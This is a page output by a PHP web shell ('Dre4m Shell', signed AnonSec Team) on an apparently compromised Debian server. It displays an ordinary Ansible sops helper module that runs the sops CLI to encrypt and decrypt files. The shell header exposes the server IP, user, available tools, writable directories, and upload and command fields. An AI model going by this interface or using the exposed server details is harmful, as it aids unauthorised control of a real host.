Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.191.236.5
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/community/sops/plugins/module_utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/community/sops/plugins/module_utils//sops.py
# Copyright (c), Edoardo Tenani <e.tenani@arduino.cc>, 2018-2020
# Simplified BSD License (see LICENSES/BSD-2-Clause.txt or https://opensource.org/licenses/BSD-2-Clause)
# SPDX-License-Identifier: BSD-2-Clause

from __future__ import absolute_import, division, print_function
__metaclass__ = type


import os

from ansible.module_utils.common.text.converters import to_text, to_native

# Since this is used both by plugins and modules, we need subprocess in case the `module` parameter is not used
from subprocess import Popen, PIPE


# Exit codes of the sops binary mapped to their symbolic names.
# Source: https://github.com/mozilla/sops/blob/master/cmd/sops/codes/codes.go
# This table is maintained by hand and has to be updated manually.
# The codes are not contiguous, and the entries are intentionally kept in
# their existing order (128 is listed before 111).
SOPS_ERROR_CODES = {
    1: "ErrorGeneric",
    2: "CouldNotReadInputFile",
    3: "CouldNotWriteOutputFile",
    4: "ErrorDumpingTree",
    5: "ErrorReadingConfig",
    6: "ErrorInvalidKMSEncryptionContextFormat",
    7: "ErrorInvalidSetFormat",
    8: "ErrorConflictingParameters",

    21: "ErrorEncryptingMac",
    23: "ErrorEncryptingTree",
    24: "ErrorDecryptingMac",
    25: "ErrorDecryptingTree",

    49: "CannotChangeKeysFromNonExistentFile",
    51: "MacMismatch",
    52: "MacNotFound",
    61: "ConfigFileNotFound",
    85: "KeyboardInterrupt",
    91: "InvalidTreePathFormat",

    100: "NoFileSpecified",
    128: "CouldNotRetrieveKey",
    111: "NoEncryptionKeyFound",

    200: "FileHasNotBeenModified",
    201: "NoEditorFound",
    202: "FailedToCompareVersions",
    203: "FileAlreadyEncrypted",
}


def _create_single_arg(argument_name):
    ''' Return an option handler that appends ``argument_name`` followed by the native-string value '''

    def add_single_argument(value, arguments, env):
        # Convert first, so a failing conversion leaves ``arguments`` untouched.
        native_value = to_native(value)
        arguments.extend((argument_name, native_value))

    return add_single_argument


def _create_comma_separated(argument_name):
    ''' Return an option handler that appends ``argument_name`` followed by all values joined with commas '''

    def add_joined_argument(value, arguments, env):
        native_items = [to_native(item) for item in value]
        joined = ','.join(native_items)
        arguments.extend((argument_name, joined))

    return add_joined_argument


def _create_repeated(argument_name):
    ''' Return an option handler that appends ``argument_name <item>`` once for every item of the value '''

    def add_repeated_argument(value, arguments, env):
        for item in value:
            native_item = to_native(item)
            arguments.append(argument_name)
            arguments.append(native_item)

    return add_repeated_argument


def _create_boolean(argument_name):
    def f(value, arguments, env):
        if value:
            arguments.append(argument_name)

    return f


def _create_env_variable(argument_name):
    def f(value, arguments, env):
        env[argument_name] = value

    return f


# Options applied to every sops invocation (both Sops.decrypt and Sops.encrypt).
# Maps an option name to a handler with the signature f(value, arguments, env);
# Sops._add_options looks up each option's value and calls the handler only
# when that value is not None. Depending on the factory used, the handler
# either extends the command line (arguments) or sets a variable in env.
GENERAL_OPTIONS = {
    'age_key': _create_env_variable('SOPS_AGE_KEY'),
    'age_keyfile': _create_env_variable('SOPS_AGE_KEY_FILE'),
    'aws_profile': _create_single_arg('--aws-profile'),
    'aws_access_key_id': _create_env_variable('AWS_ACCESS_KEY_ID'),
    'aws_secret_access_key': _create_env_variable('AWS_SECRET_ACCESS_KEY'),
    'aws_session_token': _create_env_variable('AWS_SESSION_TOKEN'),
    'config_path': _create_single_arg('--config'),
    'enable_local_keyservice': _create_boolean('--enable-local-keyservice'),
    'keyservice': _create_repeated('--keyservice'),
}


# Options that are only applied by Sops.encrypt, in addition to GENERAL_OPTIONS.
# Same structure as GENERAL_OPTIONS: option name -> handler f(value, arguments, env).
# List-valued options are passed to sops as a single comma-separated argument.
ENCRYPT_OPTIONS = {
    'age': _create_comma_separated('--age'),
    'kms': _create_comma_separated('--kms'),
    'gcp_kms': _create_comma_separated('--gcp-kms'),
    'azure_kv': _create_comma_separated('--azure-kv'),
    'hc_vault_transit': _create_comma_separated('--hc-vault-transit'),
    'pgp': _create_comma_separated('--pgp'),
    'unencrypted_suffix': _create_single_arg('--unencrypted-suffix'),
    'encrypted_suffix': _create_single_arg('--encrypted-suffix'),
    'unencrypted_regex': _create_single_arg('--unencrypted-regex'),
    'encrypted_regex': _create_single_arg('--encrypted-regex'),
    'encryption_context': _create_comma_separated('--encryption-context'),
    'shamir_secret_sharing_threshold': _create_single_arg('--shamir-secret-sharing-threshold'),
}


class SopsError(Exception):
    ''' Exception carrying a human-readable description of a failed sops invocation '''

    def __init__(self, filename, exit_code, message, decryption=True):
        '''
        Build the exception text from the sops result.

        :param filename: name of the file sops was operating on (used in the text only)
        :param exit_code: exit code returned by the sops process
        :param message: error output of sops; converted with ``to_native``
        :param decryption: selects the word "decrypt" or "encrypt" in the
            text used for exit codes missing from ``SOPS_ERROR_CODES``
        '''
        error_name = SOPS_ERROR_CODES.get(exit_code)
        if error_name is None:
            # Exit code is not in the known table: fall back to a generic text.
            action = 'decrypt' if decryption else 'encrypt'
            text = "could not %s file %s; Unknown sops error code: %s; message: %s" % (
                action, filename, exit_code, to_native(message))
        else:
            text = "error with file %s: %s exited with code %d: %s" % (
                filename, error_name, exit_code, to_native(message))
        super(SopsError, self).__init__(text)


class Sops():
    ''' Utility class to perform sops CLI actions '''

    @staticmethod
    def _add_options(command, env, get_option_value, options):
        '''
        Apply every configured option to the command line and environment.

        :param command: list of command line arguments; extended in place
        :param env: environment mapping for the sops process; updated in place
        :param get_option_value: callable returning the value for an option
            name, or ``None`` to skip option handling altogether
        :param options: mapping of option name to handler ``f(value, command, env)``
        '''
        if get_option_value is None:
            return
        for option, f in options.items():
            v = get_option_value(option)
            # Options that are not set (None) must not touch command or env.
            if v is not None:
                f(v, command, env)

    @staticmethod
    def get_sops_binary(get_option_value):
        '''
        Return the sops executable to run.

        Uses the ``sops_binary`` option when ``get_option_value`` is given and
        yields a value other than ``None``; otherwise falls back to ``'sops'``.
        '''
        cmd = get_option_value('sops_binary') if get_option_value else None
        if cmd is None:
            cmd = 'sops'
        return cmd

    @staticmethod
    def decrypt(encrypted_file, content=None,
                display=None, decode_output=True, rstrip=True, input_type=None, output_type=None, get_option_value=None, module=None):
        '''
        Decrypt a file (or the given content) by running ``sops --decrypt``.

        :param encrypted_file: path of the file to decrypt; replaced by
            ``/dev/stdin`` when ``content`` is provided
        :param content: encrypted data passed to sops on stdin, or ``None``
            to let sops read ``encrypted_file`` itself
        :param display: optional object whose ``vvvv()`` method receives the
            stderr output of sops
        :param decode_output: convert the output to text with ``to_text``
        :param rstrip: strip trailing whitespace from the output
        :param input_type: value for ``--input-type`` (omitted when ``None``)
        :param output_type: value for ``--output-type`` (omitted when ``None``)
        :param get_option_value: callable used to look up the general options
        :param module: optional object providing ``run_command()``; when not
            given, ``subprocess.Popen`` is used directly
        :returns: the output of sops (text if ``decode_output``, else as
            returned by the process)
        :raises SopsError: when sops exits with a non-zero exit code
        '''
        # Run sops directly, python module is deprecated
        command = [Sops.get_sops_binary(get_option_value)]
        env = os.environ.copy()
        Sops._add_options(command, env, get_option_value, GENERAL_OPTIONS)
        if input_type is not None:
            command.extend(["--input-type", input_type])
        if output_type is not None:
            command.extend(["--output-type", output_type])
        if content is not None:
            encrypted_file = '/dev/stdin'
        command.extend(["--decrypt", encrypted_file])

        if module:
            exit_code, output, err = module.run_command(command, environ_update=env, encoding=None, data=content, binary_data=True)
        else:
            process = Popen(command, stdin=None if content is None else PIPE, stdout=PIPE, stderr=PIPE, env=env)
            (output, err) = process.communicate(input=content)
            exit_code = process.returncode

        # sops logs always to stderr, as stdout is used for
        # file content
        if err and display:
            display.vvvv(to_text(err, errors='surrogate_or_strict'))

        # Check for failure before touching the output: decoding the stdout of
        # a failed run could raise and hide the actual sops error.
        if exit_code != 0:
            raise SopsError(encrypted_file, exit_code, err, decryption=True)

        if decode_output:
            # output is binary, we want UTF-8 string
            output = to_text(output, errors='surrogate_or_strict')
            # the process output is the decrypted secret; be cautious

        if rstrip:
            output = output.rstrip()

        return output

    @staticmethod
    def encrypt(data, display=None, cwd=None, input_type=None, output_type=None, get_option_value=None, module=None):
        '''
        Encrypt data by running ``sops --encrypt /dev/stdin``.

        :param data: content passed to sops on stdin
        :param display: optional object whose ``vvvv()`` method receives the
            stderr output of sops
        :param cwd: working directory for the sops process
        :param input_type: value for ``--input-type`` (omitted when ``None``)
        :param output_type: value for ``--output-type`` (omitted when ``None``)
        :param get_option_value: callable used to look up the general and
            encryption specific options
        :param module: optional object providing ``run_command()``; when not
            given, ``subprocess.Popen`` is used directly
        :returns: the stdout of sops, not decoded
        :raises SopsError: when sops exits with a non-zero exit code
        '''
        # Run sops directly, python module is deprecated
        command = [Sops.get_sops_binary(get_option_value)]
        env = os.environ.copy()
        Sops._add_options(command, env, get_option_value, GENERAL_OPTIONS)
        Sops._add_options(command, env, get_option_value, ENCRYPT_OPTIONS)
        if input_type is not None:
            command.extend(["--input-type", input_type])
        if output_type is not None:
            command.extend(["--output-type", output_type])
        command.extend(["--encrypt", "/dev/stdin"])

        if module:
            exit_code, output, err = module.run_command(command, data=data, binary_data=True, cwd=cwd, environ_update=env, encoding=None)
        else:
            process = Popen(command, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd, env=env)
            (output, err) = process.communicate(input=data)
            exit_code = process.returncode

        # sops logs always to stderr, as stdout is used for
        # file content
        if err and display:
            display.vvvv(to_text(err, errors='surrogate_or_strict'))

        if exit_code != 0:
            raise SopsError('to stdout', exit_code, err, decryption=False)

        return output


def get_sops_argument_spec(add_encrypt_specific=False):
    '''
    Build the argument spec dictionary for the sops related options.

    :param add_encrypt_specific: when true, the options that are only
        relevant for encryption are added to the general ones
    :returns: a newly created dictionary mapping option names to their
        argument spec dictionaries
    '''
    spec = {
        'sops_binary': {'type': 'path'},
        'age_key': {'type': 'str', 'no_log': True},
        'age_keyfile': {'type': 'path'},
        'aws_profile': {'type': 'str'},
        'aws_access_key_id': {'type': 'str'},
        'aws_secret_access_key': {'type': 'str', 'no_log': True},
        'aws_session_token': {'type': 'str', 'no_log': True},
        'config_path': {'type': 'path'},
        'enable_local_keyservice': {'type': 'bool', 'default': False},
        'keyservice': {'type': 'list', 'elements': 'str'},
    }
    if not add_encrypt_specific:
        return spec

    # Every entry gets its own dictionary object, so callers may modify one
    # option's spec without affecting the others.
    for list_option in ('age', 'kms', 'gcp_kms', 'azure_kv', 'hc_vault_transit', 'pgp'):
        spec[list_option] = {'type': 'list', 'elements': 'str'}
    for str_option in ('unencrypted_suffix', 'encrypted_suffix', 'unencrypted_regex', 'encrypted_regex'):
        spec[str_option] = {'type': 'str'}
    spec['encryption_context'] = {'type': 'list', 'elements': 'str'}
    spec['shamir_secret_sharing_threshold'] = {'type': 'int', 'no_log': False}
    return spec

Anon7 - 2022
AnonSec Team